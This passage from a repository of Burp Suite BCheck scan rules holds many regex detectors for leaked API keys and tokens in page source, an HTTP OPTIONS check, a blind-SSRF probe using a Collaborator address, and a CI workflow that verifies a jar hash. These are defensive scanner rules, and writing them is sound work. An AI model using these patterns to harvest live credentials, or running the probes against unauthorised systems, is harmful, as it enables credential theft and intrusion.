16 | end if 17 | -------------------------------------------------------------------------------- /other/tokens/aws-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "AWS API Key" 4 | description: "Looks for AWS API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "aws", "amazon", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "AWS API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/azure-apim-secretkey.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Azure APIM Secret Key" 4 | description: "Looks for Azure APIM Secret Key in page source." 5 | author: "@puzzlepeaches" 6 | tags: "azure", "apim", "microsoft", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "Ocp-Apim-Subscription-Key:" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Azure - APIM Secret Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/fcm-server-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "FCM Server Key" 4 | description: "Looks for Firebase Cloud Messaging (FCM) server keys in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "FCM server key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-client-id.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google Client ID" 4 | description: "Looks for Google client IDs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "google", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google client ID found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/npm-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NPM Access Token (fine-grained)" 4 | description: "A detector for NPM access token exposure in page source." 5 | author: "@puzzlepeaches" 6 | tags: "npm", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "npm_[A-Za-z0-9]{36}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "NPM access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/razorpay-clientid-disclosure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Razorpay Client ID Disclosure" 4 | description: "Identifies exposure of Razorpay client ID." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "razorpay" 7 | 8 | given response then 9 | if {latest.response} matches "rzp_(live|test)_.{14}" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "Razorpay Client ID disclosed." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/shopify-app-secret.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify App Secret" 4 | description: "Looks for exposed Shopify app secret in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shpss_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify App Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/age-public-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Age Recipient (X25519 public key)" 4 | description: "Looks for Age Encryption public keys in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "age-encryption", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "\bage1[0-9a-z]{58}\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Age Encryption Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/codeclimate-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CodeClimate Token" 4 | description: "Looks for instances of CodeClimate tokens in the page source." 5 | author: "@puzzlepeaches" 6 | tags: "codeclimate", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)codeclima.{0,50}\b([a-f0-9]{64})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "CodeClimate token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/discord-webhook.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Discord Webhook Disclosure" 4 | description: "Looks for Discord Webhook in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "discord" 7 | 8 | given response then 9 | if {latest.response} matches "https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Discord Webhook found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/github-oauth-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub OAuth Access Token" 4 | description: "Looks for GitHub OAuth Access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "oauth", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(gho_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub OAuth Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/oauth-access-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google OAuth Access Key Disclosure" 4 | description: "Looks for Google OAuth access keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "ya29\.[0-9A-Za-z\-_]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google OAuth access key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/rubygems-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "RubyGems API Key" 4 | description: "Looks for RubyGems API keys in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "rubygems", "token", "exposure", "ruby" 7 | 8 | given response then 9 | if {latest.response} matches "rubygems_[a-f0-9]{48}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "RubyGems API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/shopify-customapp-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify Access Token (Custom App)" 4 | description: "Looks for Shopify access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shpca_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/stackhawk-api.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "StackHawk API Key" 4 | description: "Looks for StackHawk API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "stackhawk", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(hawk\.[0-9A-Za-z_-]{20}\.[0-9A-Za-z_-]{20})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "StackHawk API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/github-personal-access.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitHub Personal Access Token" 4 | description: "Looks for GitHub personal access token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "github", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(ghp_[a-zA-Z0-9]{36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitHub Personal Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/google-oauth-prefixed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google OAuth Client Secret (prefixed)" 4 | description: "Looks for Google OAuth Client Secret in page source." 5 | author: "@puzzlepeaches" 6 | tags: "google", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(GOCSPX-[a-zA-Z0-9_-]{28})" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google OAuth Client Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/technologies/Firebase-Detect.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Firebase Information Found" 4 | description: "Detects Firebase instances (firebaseapp.com references) in the response body that may be exposed" 5 | tags: "passive, firebase" 6 | 7 | given response then 8 | if {latest.response.body} matches ".*\.firebaseapp\.com.*" then 9 | report issue: 10 | severity: low 11 | confidence: firm 12 | detail: "Potentially exposed Firebase instance detected in response." 13 | remediation: "Review the Firebase instance to ensure it does not allow unauthorized users to read from or write to the database." 14 | end if 15 | -------------------------------------------------------------------------------- /other/tokens/gitlab-personal-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Personal Access Token" 4 | description: "Looks for GitLab Personal Access Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitLab Personal Access Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/jdbc-connection-string.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "JDBC Connection String Disclosure" 4 | description: "Looks for JDBC connection strings in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "jdbc" 7 | 8 | given response then 9 | if {latest.response} matches "jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "JDBC Connection String found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/loqate-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Loqate API Key" 4 | description: "Looks for Loqate API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "loqate" 7 | 8 | given response then 9 | if {latest.response} matches "[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}-[A-Z]{2}[0-9]{2}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Loqate API key found in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-rest-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "NewRelic REST API Key Disclosure" 4 | description: "Searches for NewRelic REST API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "NewRelic" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRRA-[a-f0-9]{42}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Found NewRelic REST API key in page source." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/shopify-legacy-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Shopify Access Token (Legacy Private App)" 4 | description: "Looks for Shopify access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "shopify", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(shppa_[a-fA-F0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shopify access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/stripe-restricted-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Stripe Restricted Key Disclosure" 4 | description: "Looks for Stripe restricted keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "stripe" 7 | 8 | given response then 9 | if {latest.response} matches "rk_(?:live|test)_[0-9a-zA-Z]{24}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Stripe restricted key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/twilio-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Twilio API Key" 4 | description: "Looks for Twilio API keys in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "twilio", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)twilio.{0,20}\b(sk[a-f0-9]{32})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Twilio API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/recon/Check_OPTIONS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "HTTP Methods Available (passive)" 4 | description: "Sends an HTTP OPTIONS request and reports the methods advertised in the response's Allow header" 5 | author: "Ceramicskate0" 6 | 7 | given path then 8 | send request called check: 9 | method: "OPTIONS" 10 | 11 | if {check.response.headers} matches "[Aa]llow:[^\n]+" then 12 | report issue: 13 | severity: info 14 | confidence: tentative 15 | detail: `Check the 'Allow:' Header value(s)\n\n{check.response.headers}` 16 | remediation: "N/A" 17 | end if 18 | -------------------------------------------------------------------------------- /other/tokens/adobe-oauth-secret.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Adobe OAuth Client Secret" 4 | description: "Looks for Adobe OAuth Client secrets in page source." 5 | author: "@puzzlepeaches" 6 | tags: "adobe", "oauth", "exposure", "tokens" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Adobe OAuth Client Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/jwt-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "JWT Token Disclosure" 4 | description: "Looks for exposure of various JWT tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "JWT token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-insights-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Insights Keys Disclosure" 4 | description: "Looks for New Relic Insights keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "newrelic", "keys" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Insights key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/square-oauth-secret-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Square OAuth Secret Token Exposure" 4 | description: "Looks for Square OAuth Secret in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "token", "exposure", "oauth", "square" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)\b(sq0csp-[a-z0-9_-]{43})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Square OAuth Secret found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/zenserp-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zenserp API Key" 4 | description: "Looks for Zenserp API keys in page source." 5 | author: "puzzlepeaches" 6 | tags: "exposure", "token", "zenserp", "apikey" 7 | 8 | given response then 9 | if {latest.response} matches "([0-9a-z-]{36})" and 10 | {latest.response} matches "zenserp" then 11 | report issue: 12 | severity: info 13 | confidence: tentative 14 | detail: "Zenserp API key found in page." 15 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
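end if
--------------------------------------------------------------------------------
/.github/workflows/pr_bcheck_checker.yml:
--------------------------------------------------------------------------------
name: Pull Request BCheckChecker

on:
  pull_request:
    types: [opened, reopened, edited, synchronize]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      # NOTE(review): both actions are referenced by a mutable major tag. Pinning them to a
      # full-length commit SHA would give them the same integrity guarantee the checker jar
      # gets in the step below.
      - uses: actions/checkout@v3
      - uses: actions/setup-java@v3
        with:
          java-version: '21'
          distribution: 'oracle'

      - name: Validate BChecks
        run: |
          # Supply-chain gate: the vendored checker jar must match the pinned SHA-256 digest
          # before it is executed. The substitution is quoted so a missing jar yields a clean
          # mismatch rather than a test-syntax error, and the explicit exit reports why the
          # step failed instead of relying on the shell's -e alone.
          [ "$(sha256sum BCheckChecker-1.9.jar | awk '{ print $1 }')" = 'a4e1ebffc0dabcea7e93778b86ab053b406a15782e4ffb0da48e3638a23f077d' ] || { echo '::error::BCheckChecker-1.9.jar does not match the pinned SHA-256 digest'; exit 1; }
          java -jar BCheckChecker-1.9.jar
--------------------------------------------------------------------------------
/other/tokens/shopify-public-token.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "Shopify Access Token (Public App)"
    description: "Checks for exposed Shopify access tokens in the body of public apps."
    author: "@puzzlepeaches"
    tags: "shopify", "token", "exposure"

given response then
    if {latest.response} matches "\b(shpat_[a-fA-F0-9]{32})\b" then
        report issue:
            severity: info
            confidence: tentative
            detail: "Shopify access token found in page."
            remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source."
    end if
--------------------------------------------------------------------------------
/other/tokens/shoppable-token.bcheck:
--------------------------------------------------------------------------------
metadata:
    language: v1-beta
    name: "Shoppable Service Auth Token"
    description: "Looks for Shoppable Service Auth Tokens in page source."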
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "shoppable", "token", "auth", "service" 7 | 8 | given response then 9 | if {latest.response} matches "data-shoppable-auth-token" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Shoppable Service Auth Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/heroku-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Heroku API Key" 4 | description: "Looks for Heroku API keys in page source." 5 | author: "@puzzlepeaches" 6 | tags: "heroku", "token", "exposure", "api" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)heroku.{0,20}key.{0,20}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Heroku API key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/gitlab-pipeline-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Pipeline Trigger Token" 4 | description: "Looks for GitLab Pipeline Trigger Tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(glptt-[0-9a-f]{40})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "GitLab Pipeline Trigger Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/google-calendar-link.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Google Calendar URI Disclosure" 4 | description: "Looks for Google Calendar URIs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "google" 7 | 8 | given response then 9 | if {latest.response} matches "https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Google Calendar URI found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-synthetics-location-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Synthetics Location Key Disclosure" 4 | description: "Looks for Synthetics location key disclosures in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Synthetics location key disclosure found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/cloudinary-credentials.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cloudinary Credentials Disclosure" 4 | description: "Looks for disclosed Cloudinary credentials in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "cloudinary" 7 | 8 | given response then 9 | if {latest.response} matches "cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Cloudinary credentials found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/jenkins-crumb-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Jenkins Token or Crumb in Source Code" 4 | description: "Looks for Jenkins tokens or crumbs in page source." 5 | author: "@puzzlepeaches" 6 | tags: "jenkins", "crumb", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "(?i)jenkins.{0,10}(?:crumb)?.{0,10}\b([0-9a-f]{32,36})\b" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Jenkins token or crumb found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/zapier-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zapier Webhook Disclosure" 4 | description: "Looks for disclosed Zapier Webhook tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "zapier", "webhook" 7 | 8 | given response then 9 | if {latest.response} matches "https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Zapier Webhook token found in page." 
14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /examples/blind-ssrf.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Request-level collaborator based" 4 | description: "Blind SSRF with out-of-band detection" 5 | author: "Carlos Montoya" 6 | 7 | given request then 8 | send request: 9 | headers: 10 | "Referer": {generate_collaborator_address()} 11 | 12 | if http interactions then 13 | report issue: 14 | severity: high 15 | confidence: firm 16 | detail: "This site fetches arbitrary URLs specified in the Referer header." 17 | remediation: "Ensure that the site does not directly request URLs from the Referer header." 18 | end if 19 | -------------------------------------------------------------------------------- /other/tokens/axiom-digitalocean-key-exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "DigitalOcean Key Exposure via Axiom" 4 | description: "Looks for DigitalOcean keys exposed through an Axiom do_key field in page source. Axiom is a dynamic infrastructure framework for working efficiently with multi-cloud environments." 5 | author: "@puzzlepeaches" 6 | tags: "axiom", "digitalocean","key","exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\"do_key\"\: .*" then 10 | report issue: 11 | severity: low 12 | confidence: tentative 13 | detail: "DigitalOcean key exposed via Axiom." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 
15 | end if -------------------------------------------------------------------------------- /other/tokens/braintree-access-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "PayPal Braintree Access Token Disclosure" 4 | description: "Looks for PayPal Braintree access tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "paypal" 7 | 8 | given response then 9 | if {latest.response} matches "access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Paypal Braintree access token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/newrelic-pixie-api-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Pixie API Key" 4 | description: "Looks for New Relic Pixie API Key in page source." 5 | author: "@puzzlepeaches" 6 | tags: "newrelic", "pixie", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Pixie API Key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/newrelic-pixie-deploy-key.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "New Relic Pixie Deploy Key" 4 | description: "Looks for New Relic Pixie Deploy keys in page source." 
5 | author: "@puzzlepeaches" 6 | tags: "newrelic", "pixie", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "New Relic Pixie Deploy key found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if 16 | -------------------------------------------------------------------------------- /other/tokens/gitlab-runner-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "GitLab Runner Registration Token" 4 | description: "Searches for exposed GitLab Runner Registration Token in page source." 5 | author: "@puzzlepeaches" 6 | tags: "gitlab", "runner", "token", "exposure" 7 | 8 | given response then 9 | if {latest.response} matches "\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)" then 10 | report issue: 11 | severity: info 12 | confidence: tentative 13 | detail: "Exposed GitLab Runner Registration Token found in page." 14 | remediation: "Review and remove unnecessary exposure of keys and/or sensitive data from page source." 15 | end if -------------------------------------------------------------------------------- /other/tokens/zoho-webhook-token.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Zoho Webhook Disclosure" 4 | description: "Looks for exposure of Zoho webhook tokens in page source." 5 | author: "@puzzlepeaches" 6 | tags: "exposure", "token", "zoho" 7 | 8 | given response then 9 | if {latest.response} matches "https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+" then 10 | report issue: 11 | severity: info 12 | confidence: 